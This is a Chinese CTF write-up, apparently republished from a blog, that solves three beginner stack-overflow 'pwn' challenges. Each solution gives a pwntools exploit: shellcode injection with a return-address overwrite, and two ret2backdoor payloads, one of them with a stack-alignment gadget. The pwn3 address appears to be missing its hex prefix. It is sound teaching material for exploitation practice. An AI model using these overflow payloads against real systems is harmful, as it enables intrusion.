码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 第一周pwn的题目


    目录

    1pwn

    2.pwn1

    3.pwn3


    题目链接:

    链接:https://pan.baidu.com/s/1Hgv6ABokKJzpiu44cNozaQ?pwd=eazw 
    提取码:eazw 
     

    1pwn

    checksec pwn查看保护措施

    file pwn查看文件格式

    ida反编译出来查看

    buf = mmap((void *)0x233000, 0x1000uLL, 7, 34, -1, 0LL);这里是将buf的数据位置写入mmap分配的位置0x233000

    获取rbp到rsp的距离位0xb0-0x80为48位,再加上需要填充8位垃圾数据给寄存器,

    exp就为

    from pwn import *
    
    io = process("./pwn")
    context(os = 'linux',arch = 'amd64',log_level='debug')
    buf = 0x233000
    shellcode = asm(shellcraft.sh())
    io.sendline(shellcode)  #将构造的shellcode写入buf
    payload =b'a'*56+p64(buf)
    io.sendline(payload)
    io.interactive()
     

    2.pwn1

    checksec pwn1查看保护机制

    file pwn1查看文件格式

    ida分析

    gdb调试

    from pwn import *
    context.arch = "amd64"
    io = process("./pwn1")
    
    payload = b'a'*23 + p64(0x40201B)
    io.sendline(payload)
    io.interactive()

    后面exp打不通需要我们栈对齐后再打

    最后的完整exp

    from pwn import *
    context.arch = "amd64"
    io = process("./pwn1")
    ret =0x401016
    payload = b'a'*23 +p64(ret)+ p64(0x40201B)
    io.sendline(payload)
    io.interactive()

    3.pwn3

    checksec pwn3先看看保护措施

    file pwn3查看文件格式

    gdb pwn3 动态调试给主函数打断点(我已经ida看过了确定主函数存在栈溢出)

    找到rbp距离rsp的距离

    外加64位寄存器本身需要填充的8位垃圾数据,ida中有后门函数地址

    可构建exp

    from pwn import *
    context.arch = "amd64"
    io = process("./pwn3")
    
    
    payload =  b'A'*40+p64(401186)
    io.sendline(payload)
    io.interactive()
    

    获取flag

  • 相关阅读:
    《微服务设计》第三篇 :如何建模服务
    【附源码】计算机毕业设计JAVA沙县小吃点餐系统
    WiFi模块在智能家居中的应用与优化
    JMeter笔记10 | JMeter检查点
    系统运维网络知识汇总
    制作手机IOS苹果ipa应用的重签名工具
    CF1012C Hills
    【Effective Go】高效Go编程之格式化+代码注释+命名+分号+控制结构
    WPS回应套娃式收费:AI功能投入比较大且福利期已到;Sam Altman辟谣下周发GPT-5和搜索引擎 | 极客头条
    【工作杂记】groupBy排序-操作word
  • 原文地址:https://blog.csdn.net/qq_52074678/article/details/127898148
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号